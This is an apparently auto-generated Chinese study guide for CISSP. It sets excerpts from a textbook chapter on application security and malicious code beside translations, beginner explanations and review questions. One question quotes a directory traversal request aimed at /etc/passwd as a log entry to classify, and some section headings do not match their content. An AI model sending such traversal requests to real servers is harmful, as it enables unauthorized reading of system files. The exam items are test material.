排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 55 / PDF P1449

第 1449 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Error Handling Attackers thrive on exploiting errors in code. Developers must recognize this and write their code so that it is resilient to unexpected situations that an attacker might create in order to test the boundaries of code. For example, if a web form requests an age as input, it's insufficient to simply verify that the age is an integer. Attackers might enter a 50,000-digit integer in that field in an attempt to perform an integer overflow attack. Developers must anticipate unexpected situations and write error handling code that steps in and handles these situations in a secure fashion. Improper error handling may expose code to unacceptable levels of risk.

Many programming languages include try…catch functionality that allows developers to explicitly specify how errors should be handled. In this approach, the developer writes code that may cause an error and includes it in a try clause. When the code executes, if it does cause an error, the catch clause specifies how the application should handle that error situation.

For example, consider the following Java code: int numerator = 10; int denominator = 0; try { int quotient = numerator/denominator; } catch (ArithmeticException err) { System.out.println("Division by zero!"); } In this code, the developer realizes that the line of code that divides numerator by denominator may result in a division by zero error if denominator is equal to 0. Therefore, the developer encloses that division in a try clause and provides error handling instructions in the subsequent catch clause.

中文直译 / 整理

错误处理 攻击者热衷于利用代码中的错误。 开发人员必须认识到这一点,并编写能够抵 御攻击者为测试代码边界而制造的意外情况的代码。 例如,如果网页表单要求 输入年龄,仅验证年龄是否为整数是不够的。 攻击者可能在该字段中输入一个 50,000位的整数,试图执行整数溢出攻击。 开发人员必须预见到意外情况,并 编写错误处理代码,以安全的方式应对这些情况。 不当的错误处理可能使代码 面临不可接受的风险。 许多编程语言都包含 try...catch 功能,允许开发人员明确指定如何处理错误。 在这种方法中,开发人员编写可能引发错误的代码,并将其放在 try 子句中。 当代码执行时,如果确实发生错误,catch 子句将指定应用程序应如何处理该 错误情况。 例如,考虑以下 Java 代码: int numerator = 10; int denominator = 0; try { int quotient = numerator/denominator; } catch (ArithmeticException err) { System.out.println("除零 错误!

"); } 在这段代码中,开发者意识到,将 numerator 除以 denominator 的代码行,如 果 denominator 等于 0,可能会导致除零错误。 因此,开发者将该除法操作置 于 try 子句中,并在随后的 catch 子句中提供了错误处理指令。

小白解释

场景先行:你是公司的安全负责人,正在读第 1449 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1449 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 56 / PDF P1450

第 1450 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

If you're wondering why you need to worry about error handling when you already perform input validation, remember that cybersecurity professionals embrace a defense-in-depth approach to security. For example, your input validation routine might itself contain a flaw that allows potentially malicious input to pass through to the application. Error handling serves as a secondary control in that case, preventing the malicious input from triggering a dangerous error condition. On the flip side of the error handling coin, overly verbose error handling routines may also present risk.

If error handling routines explain too much about the inner workings of code, they may allow an attacker to find a way to exploit the code. For example, Figure 21.9 shows an error message appearing on a French website that contains details of the SQL query used to create the web page. It also discloses that the database is running the MySQL database engine. You don't need to speak French to understand that this could allow an attacker to determine the table structure and attempt a SQL injection attack!

中文直译 / 整理

如果你疑惑为何在已经进行输入验证的情况下仍需关注错误处理,请记 住,网络安全专业人员采用纵深防御的安全策略。 例如,你的输入验证例程 本身可能包含缺陷,导致潜在的恶意输入得以传递到应用程序中。 在这种情 况下,错误处理作为第二道防线,防止恶意输入触发危险的错误状态。 另一方面,过于冗长的错误处理例程也可能带来风险。 如果错误处理例程过多 地揭示了代码的内部机制,可能会让攻击者找到利用代码的方法。 例如,图 21.9显示了一个法语网站上的错误消息,其中包含了用于生成网页的 SQL 查询 的详细信息,并且还透露了数据库正在运行 MySQL 数据库引擎。 你无需懂法 语就能明白,这可能让攻击者确定表结构并尝试 SQL 注入攻击!

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

纵深防御:纵深防御不是一道门,而是一层又一层控制。

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1450 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

多层控制串联、避免单点失败,就是 defense in depth。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
纵深防御 纵深防御不是一道门,而是一层又一层控制。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 57 / PDF P1451

第 1451 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

中文直译 / 整理

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

小白解释

场景先行:你是公司的安全负责人,正在读第 1451 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1451 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 58 / PDF P1452

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

FIGURE 21.9 SQL error disclosure A good general guideline is for error messages to display the minimum amount of information necessary for the user to understand the nature of the problem, insofar as it is within their control to correct it. The application should then record as much information as possible in the application log so that developers investigating the error can correct the underlying issue. Hard-Coded Credentials In some cases, developers may include usernames and passwords in source code. There are two variations on this error.

First, the developer may create a hard-coded maintenance account for the application that allows the developer to regain access even if the authentication system fails. This is known as a backdoor vulnerability and is problematic because it allows anyone who knows the backdoor password to bypass normal authentication and gain access to the system. If the backdoor becomes publicly (or privately) known, all copies of the code in production are compromised. The second variation of hard-coding credentials occurs when developers include access credentials for other services within their source code.

If that code is intentionally or accidentally disclosed, those credentials then become known to outsiders. This occurs quite often when developers accidentally publish code into a public code repository, such as GitHub, that contains API keys or other hard-coded credentials. Memory Management Applications are often responsible for managing their own use of memory, and in those cases, poor memory management practices can undermine the security of the entire system. Resource Exhaustion One of the issues that we need to watch for with memory or any other limited resource on a system is resource exhaustion.

Whether intentional or accidental, systems may consume all of the memory, storage, processing time, or other resources available on the system, rendering it disabled or crippled for other uses. Memory leaks are one example of resource exhaustion. If an application requests memory from the operating system, it will eventually no longer need

中文直译 / 整理

图 21.9 SQL 错误披露 一个良好的通用原则是,错误消息应仅显示用户理解问题性质并尽可能在其控 制范围内纠正该问题所需的最少信息。 应用程序应在应用日志中记录尽可能多 的信息,以便开发人员在调查错误时能够修正根本问题。 硬编码的凭据 在某些情况下,开发人员可能会在源代码中包含用户名和密码。 这种错误有两 种变体。 首先,开发人员可能为应用程序创建一个硬编码的维护账户,以便在 身份验证系统失效时重新获得访问权限。 这被称为 后门 漏洞,问题在于任何知 道后门密码的人都可以绕过正常的身份验证并访问系统。 如果后门被公开(或 私下)知晓,则所有生产环境中的代码副本都会受到威胁。 硬编码凭据的第二种变体发生在开发人员在源代码中包含其他服务的访问凭据 时。 如果这些代码被有意或无意地泄露,这些凭据就会被外部人员知晓。 当开 发人员不小心将包含 API 密钥或其他硬编码凭据的代码发布到公共代码仓库 (如 GitHub)时,这种情况经常发生。 内存管理 应用程序通常负责管理其自身的内存使用,在这些情况下,不良的内存管理 实践可能会破坏整个系统的安全性。 资源耗尽 我们需要关注系统内存或其他任何有限资源的问题之一是 资源耗尽。

无论是有 意还是无意,系统都可能耗尽所有可用的内存、存储、处理时间或其他资源, 导致系统无法正常使用或功能严重受限。 内存泄漏是资源耗尽的一个例子。 如果应用程序从操作系统请求内存,最终将不再 需要

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

指南:指南是建议做法,不一定强制。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 59 / PDF P1453

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

that memory and should then return the memory to the operating system for other uses. In the case of an application with a memory leak, the application fails to return some memory that it no longer needs, perhaps by simply losing track of an object that it has written to a reserved area of memory. If the application continues to do this over a long period of time, it can slowly consume all of the memory available to the system, causing it to crash. Rebooting the system often resets the problem, returning the memory to other uses, but if the memory leak isn't corrected, the cycle simply begins anew. Pointer Dereferencing Memory pointers can also cause security issues.

Pointers are a commonly used concept in application development. They are an area of memory that stores an address of another location in memory. For example, we might have a pointer called photo that contains the address of a location in memory where a photo is stored. When an application needs to access the actual photo, it performs an operation called pointer dereferencing. This means that the application follows the pointer and accesses the memory referenced by the pointer address. There's nothing unusual with this process. Applications do it all the time. One particular issue that might arise is if the pointer is empty, containing what programmers call a NULL value.

If the application tries to dereference this NULL pointer, it causes a condition known as a null pointer exception. In the best case, a NULL pointer exception causes the program to crash, providing an attacker with access to debugging information that may be used for reconnaissance of the application's security. In the worst case, a NULL pointer exception may allow an attacker to bypass security controls. Security professionals should work with application developers to help them avoid these issues. Summary Applications developers have a lot to worry about. Malicious actors are always becoming more sophisticated in their tools and techniques.

Viruses, worms, Trojan horses, logic bombs, and other malicious code exploit vulnerabilities in applications and operating systems or use social engineering to infect systems and gain access to their resources and confidential information.

中文直译 / 整理

这些内存,并应将其归还给操作系统以供其他用途使用。 对于存在内存泄漏的 应用程序,它未能归还一些不再需要的内存,可能是由于简单地丢失了对已写 入预留内存区域的对象的跟踪。 如果应用程序在长时间内持续这样做,它会逐 渐消耗系统可用的所有内存,导致系统崩溃。 重启系统通常可以重置问题,将 内存归还给其他用途,但如果内存泄漏未被修复,这一循环将重新开始。 指针解引用 内存指针也可能导致安全问题。 指针是应用程序开发中常用的概念,它们是 存储内存中另一位置地址的内存区域。 例如,我们可能有一个名为 photo 的指针,其中包含存储照片的内存位置的 地址。 当应用程序需要访问实际的照片时,它会执行一种称为 指针解引用 的 操作。 这意味着应用程序会跟随指针并访问由指针地址引用的内存。 这个过 程本身并无异常,应用程序经常执行此类操作。 可能出现的一个特定问题是,指针为空,包含程序员所称的 NULL 值。 如果应 用程序尝试解引用此 NULL 指针,就会导致一种称为空指针异常的情况。 在最 好的情况下,空指针异常会导致程序崩溃,使攻击者能够获取可用于侦察应用 程序安全性的调试信息;

在最坏的情况下,空指针异常可能允许攻击者绕过安 全控制。 安全专业人员应与应用程序开发人员合作,帮助他们避免这些问题。 摘要 应用程序开发人员需要担心的事情很多。 恶意行为者不断使其工具和技术变得 更加复杂。 病毒、蠕虫、木马、逻辑炸弹和其他恶意代码利用应用程序和操作 系统中的漏洞,或通过社会工程学手段感染系统,以获取其资源和机密信息。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 60 / PDF P1454

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Ransomware combines malware with encryption technology to deny users access to their data until they pay a substantial ransom. Applications themselves also may contain a number of vulnerabilities. Buffer overflow attacks exploit code that lacks proper input validation to affect the contents of a system's memory. Backdoors provide former developers and malicious code authors with the ability to bypass normal authentication mechanisms. Rootkits provide attackers with an easy way to conduct privilege escalation attacks. Many applications are moving to the web, creating a new level of exposure and vulnerability.

Cross-site scripting attacks allow attackers to trick users into providing sensitive information to insecure sites. SQL injection attacks allow the bypassing of application controls to directly access and manipulate the underlying database. Study Essentials Understand the propagation techniques used by viruses. Viruses use four main propagation techniques—file infection, service injection, boot sector infection, and macro infection—to penetrate systems and spread their malicious payloads. You need to understand these techniques to effectively protect systems on your network from malicious code. Explain the threat posed by ransomware.

Ransomware uses traditional malware techniques to infect a system and then encrypts data on that system using a key known only to the attacker. The attacker then demands payment of a ransom from the victim in exchange for providing the decryption key. Know how antivirus software packages detect known viruses. Most antivirus programs use signature-based detection algorithms to look for telltale patterns of known viruses. This makes it essential to periodically update virus definition files in order to maintain protection against newly authored viruses as they emerge.

Behavior-based detection monitors target users and systems for unusual activity and either blocks it or flags it for investigation. Explain how user and entity behavior analytics (UEBA) functions. UEBA tools develop profiles of individual behavior and then monitor users for deviations from those profiles that may indicate malicious activity and/or compromised accounts.

中文直译 / 整理

勒索软件将恶意软件与加密技术结合,直到用户支付巨额赎金后才允许其访问 数据。 应用程序本身也可能包含许多漏洞。 缓冲区溢出攻击利用缺乏适当输入验证的 代码来影响系统内存的内容。 后门为前开发人员和恶意代码作者提供了绕过正 常身份验证机制的能力。 根套件为攻击者提供了轻松实施权限提升攻击的途径。 许多应用程序正转向网络,这带来了新的暴露和脆弱性层面。 跨站脚本攻击允 许攻击者诱骗用户向不安全的网站提供敏感信息。 SQL注入攻击允许绕过应用 程序控制,直接访问和操作底层数据库。 学习要点 了解病毒使用的传播技术。 病毒使用四种主要的传播技术——文件感染、服务 注入、引导扇区感染和宏感染——来渗透系统并传播其恶意有效载荷。 您需要 了解这些技术,以便有效保护网络上的系统免受恶意代码的侵害。 解释勒索软件构成的威胁。 勒索软件使用 传统恶意软件技术感染系统,然后使用仅攻击者知晓的密钥加密该系统上的数 据。 攻击者随后要求受害者支付赎金,以换取提供解密密钥。 了解杀毒软件包如何检测已知病毒。 大多数杀毒程序使用基于签名的检测算法来 查找已知病毒的典型特征模式。 因此,必须定期更新病毒定义文件,以应对新出 现的病毒并保持防护能力。

基于行为的检测会监控目标用户和系统是否存在异常 活动,并阻止此类活动或将其标记以供调查。 Explain how user and entit y behavior anal ytics (UEBA) 功能。 UEBA工具会建立个人行为的画像,然后监控用户是否偏离这些画像,以发现 可能表明恶意活动和/或账户被入侵的行为。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 61 / PDF P1455

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Be familiar with the various types of application attacks attackers use to exploit poorly written software. Application attacks are one of the greatest threats to modern computing. Attackers exploit buffer overflows, backdoors, time-of-check-to-time-of-use vulnerabilities, and rootkits to gain illegitimate access to a system. Security professionals must have a clear understanding of each of these attacks and associated countermeasures. Understand common web application vulnerabilities and countermeasures. As many applications move to the web, developers and security professionals must understand the new types of attacks that exist in this environment and how to protect against them.

The two most common examples are cross-site scripting (XSS) and SQL injection attacks. Written Lab 1. What is the major difference between a virus and a worm? 2. What are the actions an antivirus software package might take when it discovers an infected file? 3. Explain how a data integrity assurance package like Tripwire provides some secondary virus detection capabilities. 4. What controls may be used to protect against SQL injection vulnerabilities? Review Questions 1. Dylan is reviewing the security controls currently used by his organization and realizes that he lacks a tool that might identify abnormal actions taken by an end user. What type of tool would best meet this need? A. EDR B.

Integrity monitoring C. Signature detection D. UEBA 2. Tim is working to improve his organization's anti-malware defenses and would also like to reduce the operational burden on his security team.

中文直译 / 整理

熟悉攻击者利用编写不良的软件所使用的各种应用程序攻击类型。 应用程序攻 击是现代计算面临的最大威胁之一。 攻击者利用缓冲区溢出、后门、检查到使用 时间漏洞和根kit来非法获取系统访问权限。 安全专业人员必须清楚地了解每种 攻击及其相应的对策。 了解常见的 Web 应用程序漏洞和 对策。 随着越来越多的应用程序迁移到Web,开发人员和安全专业人员必须了 解此环境中存在的新型攻击及其防护方法。 最常见的两种例子是跨站脚本( XSS)和SQL注入攻击。 实验练习 1. 病毒和蠕虫的主要区别是什么? 2. 杀毒软件包在发现感染文件时可能会采取哪些操作? 3. 解释像 Tripwire 这样的数据完整性保护工具如何提供一些次要的病毒检 测功能。 4. 可以使用哪些措施来防范 SQL 注入漏洞? 复习问题 1. 迪伦正在审查其组织当前使用的安全控制措施,并意识到他缺少一种 可能识别终端用户异常行为的工具。 哪种类型的工具最能满足这一需求? A. EDR B. 完整性监控 C. 特征检测 D. UEBA 2. 蒂姆正在努力改进其组织的反恶意软件防御,并希望减轻安全团队的操作负 担。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

跨站脚本 XSS:XSS 把脚本注入到网页,让浏览器执行。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

输出编码、输入验证、CSP 可降低 XSS 风险。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 62 / PDF P1456

第 1456 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Which one of the following solutions would best meet his needs? A. UEBA B. MDR C. EDR D. NGEP 3. Carl works for a government agency that has suffered a ransomware attack and has lost access to critical data but does have access to backups. Which one of the following actions would best restore this access while minimizing the risk facing the organization? A. Pay the ransom. B. Rebuild systems from scratch. C. Restore backups. D. Install antivirus software. 4. What attack technique is often leveraged by advanced persistent threat groups but not commonly available to other attackers, such as script kiddies and hacktivists? A. Zero-day exploit B. Social engineering C. Trojan horse D.

SQL injection 5. John found a vulnerability in his code where an attacker can enter too much input and then force the system running the code to execute targeted commands. What type of vulnerability has John discovered? A. TOCTTOU B. Buffer overflow C. XSS D. XSRF 6. Mary identified a vulnerability in her code where it fails to check during a session to determine whether a user's permission has been revoked. What type of vulnerability is this?

中文直译 / 整理

以下哪种解决方案最能满足他的需求? A. UEBA B. MDR C. EDR D. NGEP 3. 卡尔就职于一家政府机构,该机构遭受了勒索软件攻击,导致无法访问关 键数据,但仍有备份可用。 以下哪项操作能最好地恢复访问权限,同时最小 化组织面临的风险? A. 支付赎金。 B. 从头重建系统。 C. 恢复备份。 D. 安装杀毒软件。 4. 哪种攻击技术通常被高级持续性威胁组织利用,但普通攻击者(如脚本 小子和黑客活动家)通常无法使用? A. 零日漏洞利用 B. 社会工程学 C. 特洛伊木马 D. SQL注入 5. 约翰在他的代码中发现了一个漏洞,攻击者可以输入过多的数据,从而 强制运行该代码的系统执行目标命令。 约翰发现了哪种类型的漏洞? A. TOCTTOU B. 缓冲区溢出 C. XSS D. XSRF 6. 玛丽在她的代码中发现了一个漏洞:在会话期间,代码未能检查用户权限 是否已被撤销。 这种漏洞属于什么类型?

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

注入攻击:注入攻击把恶意输入当命令或查询执行。

跨站脚本 XSS:XSS 把脚本注入到网页,让浏览器执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1456 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

输出编码、输入验证、CSP 可降低 XSS 风险。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
注入攻击 注入攻击把恶意输入当命令或查询执行。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 63 / PDF P1457

第 1457 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A. Back door B. TOC/TOU C. Buffer overflow D. SQL injection 7. What programming language construct is commonly used to perform error handling? A. if…then B. case…when C. do…while D. try…catch 8. Fred is reviewing the logs from his web server for malicious activity and finds this request: http://www.mycompany.com/../../../etc/passwd. What type of attack was most likely attempted? A. SQL injection B. Session hijacking C. Directory traversal D. File upload 9. A developer added a subroutine to a web application that checks to see whether the date is April 1 and, if it is, randomly changes user account balances. What type of malicious code is this? A. Logic bomb B. Worm C. Trojan horse D.

Virus 10. Francis is reviewing the source code for a database-driven web application that his company is planning to deploy. He is paying particular attention to the use of input validation within that application. Of the characters listed below, which is most commonly used in SQL injection attacks? A. ! A.

中文直译 / 整理

后门 B. TOC/TOU C. 缓冲区溢出 D. SQL注入 7. 哪种编程语言结构常用于错误处理? A. 如果...那么 B. case...when C. do...while D. try...catch 8. 弗雷德正在检查其Web服务器的日志以寻找恶意活动,并发现此请求: http://www.mycompany.com/../../../etc/passwd。 最可能尝试的是哪种攻击? A. SQL注入 B. 会话劫持 C. 目录遍历 D. 文件上传 9. 一名开发者向Web应用程序添加了一个子程序,该程序检查日期是否为 4月1日,如果是,则随机更改用户账户余额。 这种恶意代码属于哪种类型? A. 逻辑炸弹 B. 蠕虫 C. 木马 D. 病毒 10. 弗朗西斯正在审查他公司计划部署的数据库驱动型Web应用程序的源代码。 他特别关注该应用程序中的输入验证。 在以下字符中,哪个最常用于SQL注入 攻击? A. !

小白解释

